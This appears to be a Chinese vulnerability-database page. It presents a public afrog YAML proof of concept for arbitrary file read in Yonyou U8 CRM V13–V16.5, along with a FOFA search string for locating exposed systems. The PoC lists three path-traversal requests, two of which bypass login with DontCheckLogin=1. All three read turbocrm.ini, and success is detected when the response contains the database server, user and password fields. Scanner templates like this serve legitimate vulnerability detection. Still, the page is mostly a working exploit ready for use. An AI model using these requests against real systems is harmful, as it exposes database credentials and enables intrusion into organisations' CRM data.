yonyou-u8-crm-fileread: 用友U8 CRM V13-V16.5系统任意文件读取

日期: 2025-09-01 | 影响软件: 用友U8 CRM | POC: 已公开

漏洞描述

fofa: body="用友U8CRM"

PoC代码[已公开]

id: yonyou-u8-crm-fileread

info:
  name: 用友U8 CRM V13-V16.5系统任意文件读取
  author: zan8in
  severity: high
  verified: true
  description: |-
    fofa: body="用友U8CRM"
  tags: yonyou,u8,crm,fileread
  created: 2024/06/18

rules:
  r0:
    request:
      method: GET
      path: /pub/help2.php?key=/../../tsvr/turbocrm.ini
    expression: response.status == 200 && response.body.bcontains(b'DBServer=') && response.body.bcontains(b'DBName=') && response.body.bcontains(b'DBUser=') && response.body.bcontains(b'DBPswd=')
  r1:
    request:
      method: GET
      path: /ajax/getemaildata.php?DontCheckLogin=1&filePath=../../../tsvr/turbocrm.ini
    expression: response.status == 200 && response.body.bcontains(b'DBServer=') && response.body.bcontains(b'DBName=') && response.body.bcontains(b'DBUser=') && response.body.bcontains(b'DBPswd=')
  r2:
    request:
      method: GET
      path: /pub/downloadfile.php?DontCheckLogin=1&url=/datacache/../../../tsvr/turbocrm.ini
    expression: response.status == 200 && response.body.bcontains(b'DBServer=') && response.body.bcontains(b'DBName=') && response.body.bcontains(b'DBUser=') && response.body.bcontains(b'DBPswd=')
expression: r0() || r1() || r2()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/yonyou-u8-crm-fileread.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

yonyou-u8-crm-getemaildata-uploadfile: 用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞 POC

用友U8 CRM checkselectpartapply.php SQL注入漏洞 无POC

用友U8+crm bgt/recievesms.php存在sql注入漏洞 无POC

用友U8 CRM 存在SQL注入漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

用友U8 CRM checkselectpartapply.php SQL注入漏洞无POC

用友U8+crm bgt/recievesms.php存在sql注入漏洞无POC

用友U8 CRM 存在SQL注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC